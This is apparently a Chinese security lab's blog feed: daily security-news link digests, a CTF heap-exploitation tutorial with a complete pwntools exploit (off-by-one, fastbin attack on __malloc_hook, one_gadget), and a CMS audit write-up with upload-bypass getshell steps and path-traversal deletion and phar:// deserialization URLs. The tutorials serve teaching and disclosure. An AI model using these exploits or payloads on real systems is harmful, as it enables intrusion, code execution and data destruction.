网络安全日报 2021年05月17日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、黑客滥用Microsoft Build Engine来传播恶意软件 https://thehackernews.com/2021/05/hackers-using-microsoft-build-engine-to.html2、Rapid7源代码受Codecov供应链攻击影响 https://thehackernews.com/2021/05/rapid7-source-code-breached-in-codecov.html3、Magecart使用网站图标隐藏PHP后门 https://thehackernews.com/2021/05/magecart-hackers-now-hide-php-based.html4、FIN7网络犯罪团伙将Lizar后门伪装称渗透测试工具进行传播 https://threatpost.com/fin7-backdoor-ethical-hacking-tool/166194/5、思科修复了VPN产品中了代码执行漏洞 https://www.securityweek.com/cisco-patches-code-execution-flaw-vpn-product-6-months-after-disclosure6、Avaddon勒索软件团伙入侵了法国金融咨询公司Acer Finance https://securityaffairs.co/wordpress/117991/cyber-crime/avaddon-ransomware-acer-finance-axa.html7、AMD SEV保护系统存在漏洞可被绕过 https://securityaffairs.co/wordpress/117981/security/amd-sev-attacks.html8、QNAP警告eCh0raix勒索软件和Roon Server零日攻击 https://securityaffairs.co/wordpress/117943/hacking/qnap-ech0raix-ransomware-roon-server.html9、scheme flooding技术可在不同浏览器之间(包括Tor)识别用户 https://securityaffairs.co/wordpress/117933/digital-id/fingerprinting-technique-scheme-flooding.html10、Darkside勒索运营商失去了对服务器和资金的控制 https://securityaffairs.co/wordpress/117918/cyber-crime/fbi-seized-darkside-servers.html
网络安全日报 2021年05月14日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、暗网出售虚假COVID-19疫苗接种证明 https://thehackernews.com/2021/05/dark-web-getting-loaded-with-bogus.html2、模拟 AirTag 利用 Apple 的 Find My 网络传输任意数据 https://positive.security/blog/send-my3、Black Hat USA 2021 会议议题陆续开始公布 https://www.blackhat.com/us-21/briefings/schedule/4、腾讯科恩实验室发布奔驰汽车信息安全研究综述报告 https://keenlab.tencent.com/zh/2021/05/12/Tencent-Security-Keen-Lab-Experimental-Security-Assessment-on-Mercedes-Benz-Cars/5、拜登签署行政命令以改善国家的网络安全 https://securityaffairs.co/wordpress/117847/security/biden-executive-order-cybersecurity.html6、CISA和FBI发布有关DarkSide勒索软件的联合警报 https://securityaffairs.co/wordpress/117835/malware/darkside-cisa-fbi-alert.html7、微软分享了航空航天领域恶意软件攻击的详细信息 https://www.hackread.com/microsoft-malware-attack-aerospace-travel-sector/8、美国多家机构联合分析了5G网络的潜在风险 https://securityaffairs.co/wordpress/117802/security/5g-networks-risks.html9、Trust Wallet和MetaMask用户遭受网络钓鱼攻击 https://www.bleepingcomputer.com/news/security/trust-wallet-metamask-crypto-wallets-targeted-by-new-support-scam/10、网络犯罪分子利用搜索引擎广告来宣传钓鱼网站 https://therecord.media/fbi-warns-of-cybercriminals-abusing-search-ads-to-promote-phishing-sites/
网络安全日报 2021年05月13日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、FragAttacks影响几乎所有具备Wi-Fi功能的设备 https://threatpost.com/fragattacks-wifi-bugs-millions-devices/166080/2、微软周二补丁日更新修复了数十个安全漏洞 https://thehackernews.com/2021/05/latest-microsoft-windows-updates-patch.html3、新型银行木马TeaBot Android针对欧洲的银行 https://securityaffairs.co/wordpress/117812/malware/teabot-android-banking-trojan.html4、研究人员成功入侵Apple AirTag https://securityaffairs.co/wordpress/117784/hacking/apple-airtag-hacked.html5、日本制造商Yamabiko遭Babuk勒索软件攻击 https://www.infosecurity-magazine.com/news/japanese-manufacturer-yamabiko/6、CISA发布有关FiveHands勒索软件的分析报告 https://cyware.com/news/cisa-analysis-on-fivehands-ransomware-7d6bf5d67、美国情报机构警告5G网络中的安全漏洞 https://thehackernews.com/2021/05/us-intelligence-agencies-warn-about-5g.html8、Adobe Reader 0day 在野利用 https://thehackernews.com/2021/05/alert-hackers-exploit-adobe-reader-0.html9、安全研究人员深入调查Darkside勒索软件 https://www.securityweek.com/security-researchers-dive-darkside-ransomware10、SAP修补了NetWeaver产品中的高危漏洞 https://www.securityweek.com/sap-patches-high-severity-flaws-business-one-netweaver-products
网络安全日报 2021年05月12日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、Adobe发布警告称Windows用户受PDF Reader零日漏洞影响 https://www.securityweek.com/adobe-windows-users-hit-pdf-reader-zero-day2、西门子修复了因第三方组件引入导致的60个漏洞 https://www.securityweek.com/siemens-addresses-60-vulnerabilities-introduced-third-party-components3、加州大学确认在网络攻击中个人信息被盗 https://www.securityweek.com/university-california-confirms-personal-information-stolen-cyberattack4、Chrome 90更新修补了19个漏洞 https://www.securityweek.com/google-patches-19-vulnerabilities-chrome-90-update5、2015年XcodeGhost恶意软件影响了1.28亿iOS用户 https://www.securityweek.com/xcodeghost-malware-discovered-2015-impacted-128-million-ios-users6、专家警告新的Android银行木马TeaBot窃取用户凭证 https://thehackernews.com/2021/05/experts-warn-of-new-android-banking.html7、伦斯勒理工学院遭网络攻击被迫取消考试 https://www.infosecurity-magazine.com/news/university-cancels-exams-after/8、GitHub增加了安全密钥功能强化账号保护 https://www.bleepingcomputer.com/news/security/github-now-supports-security-keys-when-using-git-over-ssh/9、DarkSide勒索软件发布声明称今后攻击目标之前会先进行审查 https://www.bleepingcomputer.com/news/security/darkside-ransomware-will-now-vet-targets-after-pipeline-cyberattack/10、柠檬鸭Cryptojacking僵尸网络新增Exchange服务器作为目标 https://threatpost.com/lemon-duck-cryptojacking-botnet-tactics/165986/
网络安全日报 2021年05月11日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、Twilio, HashiCorp 受Codecov供应链攻击影响 https://www.securityweek.com/twilio-hashicorp-among-codecov-supply-chain-hack-victims2、Colonial Pipeline被攻击与DarkSide勒索软件有关 https://www.securityweek.com/cyberattack-us-pipeline-linked-criminal-gang3、研究发现超25%的Tor出口流量被控制 https://thehackernews.com/2021/05/over-25-of-tor-exit-relays-are-spying.html4、研究人员发现基于Rust的Buer恶意软件变种 https://thehackernews.com/2021/05/a-new-buer-malware-variant-has-been.html5、WordPress插件CleanTalk存在SQL注入漏洞 https://securityaffairs.co/wordpress/117721/security/anti-spam-wordpress-plugin-flaw.html6、研究人员发现苹果AirTag漏洞可导致遭黑客入侵 https://news.softpedia.com/news/german-security-researcher-managed-to-hack-and-reprogram-airtag-532859.shtml7、诈骗者仿冒NBC综艺节目窃取用户的加密货币 https://www.bleepingcomputer.com/news/security/twitter-scammers-impersonate-snl-in-elon-musk-cryptocurrency-scams/8、Facebook敦促用户接受WhatsApp的隐私政策 https://thehackernews.com/2021/05/facebook-will-limit-your-whatsapp.html9、全球仅13%的iOS用户开启应用追踪透明功能 https://www.zdnet.com/article/user-opt-in-rate-for-tracking-across-ios-sitting-at-13-globally/10、Google发布了用于验证容器的开源工具 https://www.securityweek.com/google-releases-open-source-tool-verifying-containers
快速入门堆溢出技巧(OFF BY ONE)
你是否正在收集各类网安网安知识学习,蚁景网安实验室为你总结了1300+网安技能任你学,https://www.yijinglab.com/loginLab.do#stu>> OFF BY ONE 所谓OFF BY ONE就是利用堆溢出一个字节到下一个堆块,使得目前堆块与下一堆块合并成一个堆块,此时堆块的大小就是我们溢出的那一字节 并且堆块的fd(前驱指针)以及bk(后继指针)都会指向 main_arena+88的地址这也是我们泄露出来的地址 利用gdb 输入libc查看基地址,main_arena+88-libc=offset 本文涉及相关实验:https://www.yijinglab.com/expc.do?ec=9613f998-8cd2-4981-9bc5-9900c97371de (本实验主要介绍了缓冲区溢出基础与实例,通过本实验的学习,了解缓冲区溢出的原理与危害,掌握防范缓冲区溢出的基本方法) UNSORTERBIN&FASTBINS 在堆块的bins中分为fastbins,largebins,smallbins还有今天要用到的unsortedbin。所谓unsortedbin就是为未分类的区块。 例题讲解 本次我选用V&N在2020的招新赛的simpleheap 如有需要可在buuctf找到 思路概述 我们先创建足够的堆块一般对于这种菜单类型的题目我们创建4个堆块 其中编号为3(编号从0到3)的堆块用来隔开top chunk避免我们需要用到的 编号为1,2的堆块中的2堆块与top chunk重合导致无法使用unsortedbin攻击 接着去利用off by one+unsortedbin泄露libc(使用show函数)最后将堆排布好并构建payload传入即可 First step 常规操作checksec 保护全开64位,倒也正常。接着拉进ida慢慢分析 q@ubuntu:~$ checksec vn [*] '/home/q/vn'   Arch:     amd64-64-little   RELRO:   Full RELRO   Stack:   Canary found   NX:       NX enabled   PIE:     PIE enabled 如下我们可以发现是个非常经典的菜单题目,那么经过查找漏洞点发现在edit函数 void __fastcall main(__int64 a1, char **a2, char **a3) { sub_A39(a1, a2, a3); puts("Welcome to V&N challange!"); puts("This's a simple heap for you."); while ( 1 ) {   menu();   switch ( (unsigned int)sub_9EA() )   {     case 1u:       add();       break;     case 2u:       edit();       break;     case 3u:       show();       break;     case 4u:       del();       break;     case 5u:       exit(0);     default:       puts("Please input current choice.");       break;   } } } 如下get_input_content里面有个off by one 的漏洞 unsigned __int64 __fastcall sub_C39(__int64 a1, int a2) { unsigned __int64 result; // rax unsigned int i; // [rsp+1Ch] [rbp-4h] for ( i = 0; ; ++i ) {   result = i;   if ( (int)i > a2 )     break;   if ( !read(0, (void *)((int)i + a1), 1uLL) )     exit(0);   if ( *(_BYTE *)((int)i + a1) == 10 )   {     result = (int)i + a1;     *(_BYTE *)result = 0;     return result;   } } return result; } Second step 在第一步我们对程序的漏洞点寻找完毕 现在我们要开始第二步去利用off by one创建fake chunk了,先上交互函数 from pwn import * context(log_level='debug') r=process('./vn') #elf=ELF('./vn') #r=remote('node3.buuoj.cn',28465) libc=ELF('16.so') def add(size,content):       r.recvuntil("choice: ")       r.sendline("1")       r.sendlineafter("size?",str(size))       r.sendlineafter("content:",content) def edit(idx,content):       r.recvuntil("choice: ")       r.sendline("2")       r.sendlineafter("idx?",str(idx))       r.sendlineafter("content:",content) def dump(idx):       r.recvuntil("choice: ")       r.sendline("3")       r.sendlineafter("idx?",str(idx)) def free(idx):       r.recvuntil("choice: ")       r.sendline("4")       r.sendlineafter("idx?",str(idx)) 如思路概述所讲到我们需要创建4个堆 我们创建好的堆结构如下 在gdb中正常的堆结构如下 pwndbg> heap Allocated chunk | PREV_INUSE Addr: 0x556b208da000 Size: 0x21 Allocated chunk | PREV_INUSE Addr: 0x556b208da020 Size: 0x71 Allocated chunk | PREV_INUSE Addr: 0x556b208da090 Size: 0x71 Allocated chunk | PREV_INUSE Addr: 0x556b208da100 Size: 0x21 Top chunk | PREV_INUSE Addr: 0x556b208da120 Size: 0x20ee1 接下来我们开始利用off by one去对其创建fake chunk add(0x18,b'a')#0 add(0x68,b'a')#1 add(0x68,b'a')#2 add(0x18,b'a')#3 阻断top chunk edit(0,b'a'*0x18+b'\xe1') free(1) gdb.attach(r) gdb中调试结果如下,我们很明显的可以看见两个0x71的堆块合并成了我们想要的0xe1的堆块,此时我们的fake chunk就构建完毕了 pwndbg> heap Allocated chunk | PREV_INUSE Addr: 0x5650f994f000 Size: 0x21 Free chunk (unsortedbin) | PREV_INUSE Addr: 0x5650f994f020 Size: 0xe1 fd: 0x7fc2f9aebb78 bk: 0x7fc2f9aebb78 Allocated chunk Addr: 0x5650f994f100 Size: 0x20 Top chunk | PREV_INUSE Addr: 0x5650f994f120 Size: 0x20ee1 Third step 有了fake chunk 现在我们就需要用到unsortedbin里面的chunk去泄露libc 在开头的OFF BY ONE的介绍中我们提到了因为OFF BY ONE形成的chunk 其fd bk指针会指向main_arena+88,在gdb输入libc可以得到libc的地址 main_arena+88-libc=offset=0x3c4b78 在这里呢我们现在要解决的如何用脚本实现交互自动取得偏移呢? 这里就要继续提到 分割unsortedbin 我们重新申请一个堆块,该堆块的大小若刚好在unsortedbin中(强烈建议对半分割),我们申请回来之后通过gdb可以看见其中的堆结构如下 一个0x71在unsortedbin,另外一个是我们可以正常使用的,此时他的内容便是fd与bk指向的地址main_arena+88 pwndbg> heap Allocated chunk | PREV_INUSE Addr: 0x559615971000 Size: 0x21 Allocated chunk | PREV_INUSE Addr: 0x559615971020 Size: 0x71 Free chunk (unsortedbin) | PREV_INUSE Addr: 0x559615971090 Size: 0x71 fd: 0x7f0437e11b78 bk: 0x7f0437e11b78 Allocated chunk Addr: 0x559615971100 Size: 0x20 Top chunk | PREV_INUSE Addr: 0x559615971120 Size: 0x20ee1 因此我们可以得的泄露脚本如下 add(0x68,b'a'*0x08)#1 切割unsortedbin 使得2进入unsortedbin泄露 main_arena dump(2) leak=u64(r.recv(6).ljust(8,b'\x00')) print(hex(leak)) gdb.attach(r) libc_base=leak-(0x3c4b78)#0x7f2c05c6cb78-0x7f2c058a8000 realloc_addr=libc_base+libc.sym['__libc_realloc'] malloc_hook=libc_base+libc.sym['__malloc_hook'] fake_chunk_addr=malloc_hook-0x23 one_gadget=libc_base+0x4526a print(hex(realloc_addr)) print(hex(fake_chunk_addr)) PS: 这里可以说下为什么fake_chunk_addr=malloc_hook-0x23 这个malloc_hook-0x23刚好可以达到fastbin这个基本上每个程序都是固定的 如下0x7f78812fbaed就是fake chunk的地址处于fastbins 并且非常有意思的是此处正是我们leak处main_arena+88这个地方减去88再减去0x33得的的地址,并且该地址也是我们对堆块输入内容的地址 pwndbg> bins fastbins 0x20: 0x0 0x30: 0x0 0x40: 0x0 0x50: 0x0 0x60: 0x0 0x70: 0x55f8ce9d4090 —▸ 0x7f78812fbaed (_IO_wide_data_0+301) ◂— 0x7880fbcea0000000 0x80: 0x0 unsortedbin all: 0x0 smallbins empty largebins empty Last step 我们现在有了需要的一切,那么现在最后一步就是对堆进行排布并且传入我们构建好的payload 在这里所谓的堆排布就是我们要想办法让堆块去执行我们的传入的payload 从第三步完结的时候堆排布如下 此时我们再申请一个0x68大小的堆块就可以把unsortedbin里面的东西都拿出来 此时堆结构依然不改变,只是位于unsortedbin的chunk变成可以利用的正常chunk其fd bk指针不再指向别的地址而是去指向前驱和后继的chunk pwndbg> heap Allocated chunk | PREV_INUSE Addr: 0x555d4046b000 Size: 0x21 Allocated chunk | PREV_INUSE Addr: 0x555d4046b020 Size: 0x71 Free chunk (unsortedbin) | PREV_INUSE Addr: 0x555d4046b090 Size: 0x71 fd: 0x7ff34264eb78 bk: 0x7ff34264eb78 Allocated chunk Addr: 0x555d4046b100 Size: 0x20 Top chunk | PREV_INUSE Addr: 0x555d4046b120 Size: 0x20ee1 接下来我们再去free掉一个0x68大小的chunk 对留下来的0x68大小的chunk内容填充为fake chunk的地址 接着继续把被free的chunk申请回来,那么此时fastbin链表就会去指向fake chunk 也许语言看蒙了人,我就用图表示 图1如下是free掉后再去填充的样子 图2如下是我们把被free的chunk申请回来后的样子 此时我们可以说是已经劫持成功了,我们接着去填充payload然后再申请一个堆块就可以触发payload了 add(0x68,b'a'*0x08)# 4与2同时指向0x70 free(4) edit(2,p64(fake_chunk_addr)) add(0x68,b'a'*0x08)#4 payload=b'a'*(0x13-0x08)+p64(one_gadget)+p64(realloc_addr+12) add(0x68,payload)#5 r.recvuntil("choice: ") r.sendline("1") r.sendlineafter("size?",str(0x18)) print(hex(libc.sym['__malloc_hook'])) r.interactive() PS: 关于为什么是0x13-0x08,因为我们从main_arena-0x33的位置填充的(第三步有提到),而这个位置距离realloc_hook的距离就是(0x13-8) 关于realloc_hook压栈到底要加多少 我们可以打开gdb输入 x/32i __libc_realloc pwndbg> x/32i __libc_realloc   0x7ff34230e710 <__GI___libc_realloc>: push   r15   0x7ff34230e712 <__GI___libc_realloc+2>: push   r14   0x7ff34230e714 <__GI___libc_realloc+4>: push   r13   0x7ff34230e716 <__GI___libc_realloc+6>: push   r12   0x7ff34230e718 <__GI___libc_realloc+8>: mov   r12,rsi   0x7ff34230e71b <__GI___libc_realloc+11>: push   rbp   0x7ff34230e71c <__GI___libc_realloc+12>: push   rbx 把里面的数字一个个代入试试看。 最后的完整exp如下 EXP: 需要的libc从buuctf里面下载 from pwn import * context(log_level='debug') #r=process('./vn') #elf=ELF('./vn') r=remote('node3.buuoj.cn',28640) libc=ELF('64.so') def add(size,content):        r.recvuntil("choice: ")        r.sendline("1")        r.sendlineafter("size?",str(size))        r.sendlineafter("content:",content) def edit(idx,content):        r.recvuntil("choice: ")        r.sendline("2")        r.sendlineafter("idx?",str(idx))        r.sendlineafter("content:",content) def dump(idx):        r.recvuntil("choice: ")        r.sendline("3")        r.sendlineafter("idx?",str(idx)) def free(idx):        r.recvuntil("choice: ")        r.sendline("4")        r.sendlineafter("idx?",str(idx)) #gdb.attach(r) add(0x18,b'a')#0 add(0x68,b'a')#1 add(0x68,b'a')#2 add(0x18,b'a')#3 阻断top chunk edit(0,b'a'*0x18+b'\xe1') free(1) add(0x68,b'a'*0x08)#1 切割unsortedbin 使得2进入unsortedbin泄露main_arena dump(2) leak=u64(r.recv(6).ljust(8,b'\x00')) print(hex(leak)) libc_base=leak-(0x3c4b78)#0x7f2c05c6cb78-0x7f2c058a8000 realloc_addr=libc_base+libc.sym['__libc_realloc'] malloc_hook=libc_base+libc.sym['__malloc_hook'] fake_chunk_addr=malloc_hook-0x23 one_gadget=libc_base+0x4526a print(hex(realloc_addr)) print(hex(fake_chunk_addr)) add(0x68,b'a'*0x08)# 4与2同时指向0x70 free(4) edit(2,p64(fake_chunk_addr)) add(0x68,b'a'*0x08)#4 payload=b'a'*(0x13-0x08)+p64(one_gadget)+p64(realloc_addr+12) add(0x68,payload)#5 r.recvuntil("choice: ") r.sendline("1") r.sendlineafter("size?",str(0x18)) print(hex(libc.sym['__malloc_hook'])) r.interactive() 结果如下
网络安全日报 2021年05月10日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、TsuNAME漏洞使DNS服务器遭DDoS攻击 https://securityaffairs.co/wordpress/117687/hacking/tsuname-dns-servers-ddos.html2、网络攻击导致美国Colonial Pipeline设施被关闭 https://securityaffairs.co/wordpress/117680/hacking/colonial-pipeline-facility-cyberattack.html3、微软提醒机构警惕大规模BEC活动 https://securityaffairs.co/wordpress/117672/cyber-crime/bec-gift-card-scam.html4、研究人员发现超2.9W个不受保护的数据库19 PB数据可公开访问 https://securityaffairs.co/wordpress/117660/data-breach/data-exposed-unprotected-databases.html5、美国发出关于俄罗斯黑客组织攻击的预警 https://www.zdnet.com/article/cybersecurity-warning-russian-hackers-are-targeting-these-vulnerabilities-so-patch-now/6、医疗服务提供商CaptureRx遭勒索软件攻击 https://heimdalsecurity.com/blog/healthcare-provider-clients-affected-by-capturerx-ransomware-attack/7、Remote Mouse应用程序被发现6个0day漏洞 https://thehackernews.com/2021/05/6-unpatched-flaws-disclosed-in-remote.html8、2019以来勒索软件团伙已泄露2103家公司的数据 https://bleepingcomputer.com/news/security/ransomware-gangs-have-leaked-the-stolen-data-of-2-100-companies-so-far9、谷歌宣布了一系列旨在保护用户隐私的更改 https://thehackernews.com/2021/05/4-major-privacy-and-security-updates.html10、美国法院授权IRS查询加密货币纳税人的身份 https://www.zdnet.com/article/irs-secures-order-to-serve-kraken-with-customer-data-request-on-cryptocurrency-traders/
网络安全日报 2021年05月08日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、古巴勒索软件帮派与Hancitor恶意软件联合 https://securityaffairs.co/wordpress/117638/cyber-crime/cuba-ransomware-hancitor.html2、专家发现针对Windows的新型恶意软件Moriya rootkit https://securityaffairs.co/wordpress/117626/malware/moriya-rootkit-operation-tunnelsnake.html3、高通漏洞影响全球约30%的智能手机 https://securityaffairs.co/wordpress/117620/security/qualcomm-bus-cve-2020-11292.html4、思科修复了SD-WAN 和HyperFlex HX软件中的严重漏洞 https://securityaffairs.co/wordpress/117560/security/cisco-sd-wan-vmanage-hyperflex-hx-flaws.html5、研究人员在HPE Edgeline中发现了严重身份绕过漏洞 https://securityaffairs.co/wordpress/117513/security/hpe-edgeline-infrastructure-manager-flaw.html6、安全研究人员披露影响DNS的高危漏洞TsuNAME https://thehackernews.com/2021/05/new-tsuname-flaw-could-let-attackers.html7、英特尔和AMD CPU的新幽灵漏洞影响数十亿台计算机 https://thehackernews.com/2021/05/new-spectre-flaws-in-intel-and-amd-cpus.html8、Google将自动为某些帐户启用两步验证 https://www.securityweek.com/attackers-use-obscurity-enterprises-should-too9、红帽开源StackRox安全技术 https://www.securityweek.com/red-hat-open-sourcing-stackrox-security-technology10、美国国防部扩展了其漏洞赏金计划的范围 https://www.zdnet.com/article/dod-expands-its-bug-hunting-programme-to-networks-iot-and-more/
记某cms审计过程(新手入门篇)
你是否正在收集各类网安网安知识学习,蚁景网安实验室为你总结了1300+网安技能任你学,https://www.yijinglab.com/loginLab.do#stu>> 前言 今天放假闲着无事就找了个cms来挖挖漏洞,挖到的漏洞比较简单,适合新手入门,所以本篇文章就记录一下这几个漏洞的审计过程,以及如何从新手的角度去挖到cms一些常见的漏洞,如果是大佬就可以绕道了。 本文涉及相关实验:https://www.yijinglab.com/expc.do?ec=ECID06a1-2876-4bfb-8e59-a0096299c167  (通过本节的学习,了解文件下载漏洞的原理,通过代码审计掌握文件下载漏洞产生的原因以及修复方法。) 前置工作 寻找cms及搭建 一般来说我们可以到谷歌百度等引擎找到cms的官网下载源码,或者码云,然后在本地用phpstudy搭建起来环境 我们在这里下载cms的源码,下载之后怎么在本地搭建呢 我们打开phpstudy-》其他选项菜单-》站点域名管理里 把网站目录填写你下载源码的路径就好了,然后进hosts添加域名 然后不出意外就可以访问了 配置debug 在白盒代码审计的时候你可能会需要到断点调试,这个时候就需要用到xdebug,这里我个人用的是vscode编辑器,当然你用phpstorm也是可以的,配置过程如下 首先在vscode的应用商店下载php debug插件 在php.ini添加 [XDebug] xdebug.profiler_output_dir ="D:\phpStudy\PHPTutorial\tmp\xdebug" xdebug.trace_output_dir ="D:\phpStudy\PHPTutorial\tmp\xdebug" zend_extension="D:\phpStudy\PHPTutorial\php\php-7.1.13-nts\ext\php_xdebug.dll" xdebug.remote_enable = on xdebug.remote_autostart = on 在文件-》首选项-》设置-》用户-》扩展-》settings.json {   "php.validate.executablePath": "D:/phpStudy/PHPTutorial/php/php-7.1.13-nts/php.exe",   "editor.mouseWheelZoom": true,   "php.executablePath": "D:/phpStudy/PHPTutorial/php/php-7.1.13-nts/php.exe",   "workbench.editorAssociations": [       {           "viewType": "jupyter.notebook.ipynb",           "filenamePattern": "*.ipynb"       }   ],   "explorer.confirmDelete": false } launch.json添加 {   "version": "0.2.0",   "configurations": [   {       "name": "Listen for Xdebug",       "type": "php",       "request": "launch",       "port": 9000   },   ] } 上面一些路径自行更改一下,然后我们新建一个1.php打个断点,然后访问http://127.0.0.1/1.php,如果出现如下,就说明xdebug环境就成功搭建了 文件上传漏洞 通常来说,漏洞等级评级高的就是可以rce的高危漏洞,而想要rce最常见的就是文件上传 找文件上传漏洞的话,有两种思路,分别为黑盒和白盒,对新手来说代码功底不强的话,黑盒应该是会比较简单的,这里分别从两个不同的角度来寻找漏洞 黑盒思路 一般来说网站的后台很多地方都是可以文件上传的,我们进入后台之后可以寻找诸如文章发布处,修改头像处,附件,插件管理等地方,特别是像在文章发布处有这种富文本编辑器的地方往往会有上传图片和上传附件的功能 我们拿刚刚搭建好的cms,进入后台之后在发布文章处找到有可以上传图片的地方 我们随便上传一个1.php,发现提示上传图片发生错误,应该是被过滤了 但不确定是不是前端过滤还是后端过滤,我们先上传1.jpg,抓包改一下 发现上传成功,原来只是前端过滤,芜湖这不起飞,我们再访问一下我们上传的文件 发现已经成功getshell 这里的过滤比较简单,新手可以学一下各种绕过的技巧:https://xz.aliyun.com/t/6692 那么除了发布文章处,我们还可以在上传图片这些地方入手 我们在微信小程序这里的基本设置处看到有个首页分享封面 和上面一样,只是前端做了过滤,我们抓包改文件即可 但是这里的话只是提示上传成功,没有回显出来文件的名字,我们可以在本地文件处看看到底上传了什么东西 发现上传了wx_share_cover.php,这个文件的名字是固定的,于是我们访问试试看 发现也已经成功getshell 白盒思路 对于初学者而言,找漏洞不能只看黑盒,也要基于白盒审计进行,所谓白盒审计可以简单地理解为就是看着代码找漏洞 我们知道php文件上传的函数是move_uploaded_file(),或者一般来说上传的方法名是有upload关键字的,我们可以全局搜索他们定位到上传功能的代码里面 我们找到相应的代码块如下 可以看到validate的check就是这里的过滤,我们用上面的方法绕过即可,如果想清楚的跟踪进这个函数就可以在这里打个断点,然后分析 当然白盒寻找rce漏洞,我们还可以找找file_put_content等可以直接写文件的函数 任意文件删除 通常我们找文件删除漏洞的话,可以全局搜索unlink函数 第一处 这里的代码功能比较简单,正如注释所说的删除目录下面的所有文件,但不删除目录 我们可以看到$directory是我们可控的,而且没用做任何的过滤,说不定就可以穿越目录从而任意删除文件了,我们先手动加一个var_dump(scandir("."));来观察一下这里所处的位置 可以看到现在是在public的目录下,那我们就在上一层目录随便新建一个目录,里面随便新建几个文件试试看 我们输入 http://www.test123.com/system/dir/del?directory=../123 可以发现txt文件都被删除了,但是文件夹没有被删除 因为这个功能不能删除目录,只能删除目录的文件,如果我们还想删412315里面的文件就可以输入 http://www.test123.com/system/dir/del?directory=../123/412315 第二处 这里和第一处差不多,但是功能有点不一样,这里是可以把整个目录删除了,我们输入如下就可以删除整个123目录了 http://www.test123.com/system/dir/delDir?directory=../123 反序列化漏洞 既然前面已经挖到了文件上传漏洞,这个cms又是thinkphp6.0的版本,我们可以再找一下有没有可以触发phar函数的漏洞 第一处 突然看到我们前面的任意文件删除漏洞处,不正是有个is_dir函数吗,而且又是可以控制的,真是踏破铁鞋无觅处得来全不费功夫 我们先用网上公开的反序列化链生成test.jpg,然后利用上面的任意文件删除漏洞上传,上传到这个位置 {"code":1,"msg":"上传成功","url":["http:\/\/www.test123.com\/uploads\/postImages\/20210404\\3c5ea1104433e1cb734be47ab8377a11.jpg"]} 我们再用phar协议去触发这个文件即可rce http://www.test123.com/system/dir/del?directory=phar://uploads/postImages/20210404/3c5ea1104433e1cb734be47ab8377a11.jpg 第n处 除了上面那个任意文件删除处的is_dir,我们可以再找找还有没有其他地方能够触发的,随手一找又发现两处 这还只是单单用is_dir函数,没算上其他的就已经那么多了,这个 cms 真是"漏洞百出" 本文的漏洞已提交至 cnvd 平台,作为新手找一些少人用的 cms 挖上面几种漏洞还是比较容易的 这个技术你学会了吗?加入网安实验室,1300+网安技能任你学!
网络安全日报 2021年05月07日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、大规模DDoS导致比利时政府网站瘫痪 https://securityaffairs.co/wordpress/117529/hacking/belgiums-ddos-attack.html2、大多数Exim电子邮件服务器存在21Nails漏洞可被攻击 https://securityaffairs.co/wordpress/117522/security/exim-email-servers-21nails-flaws.html3、数亿台戴尔PC受驱动程序漏洞CVE-2021-21551影响 https://securityaffairs.co/wordpress/117514/security/cve-2021-21551-dell-flaws.html4、苹果修复了WebKit浏览器引擎中的三个零日漏洞 https://securityaffairs.co/wordpress/117500/security/apple-webkit-zero-day-flaws.html5、专家发布了针对Microsoft Exchange 高危漏洞的PoC https://securityaffairs.co/wordpress/117493/hacking/microsoft-exchange.html6、Pulse Secure已修复SSL VPN设备中的零日漏洞 https://securityaffairs.co/wordpress/117484/hacking/pulse-connect-secure-zeroday.html7、新的攻击方式可以破坏目前所有针对Spectre攻击的防御措施 https://threatpost.com/attacks-slaughter-spectre-defenses/165809/8、FiveHands勒索软件中利用SonicWall零日漏洞 https://thehackernews.com/2021/04/hackers-exploit-sonicwall-zero-day-bug.html9、累计超过1亿安装的40个应用程序发现AWS密钥泄漏 https://thehackernews.com/2021/05/over-40-apps-with-more-than-100-million.html10、卫生保健巨头Scripps Health遭勒索软件攻击 https://www.bleepingcomputer.com/news/security/health-care-giant-scripps-health-hit-by-ransomware-attack/
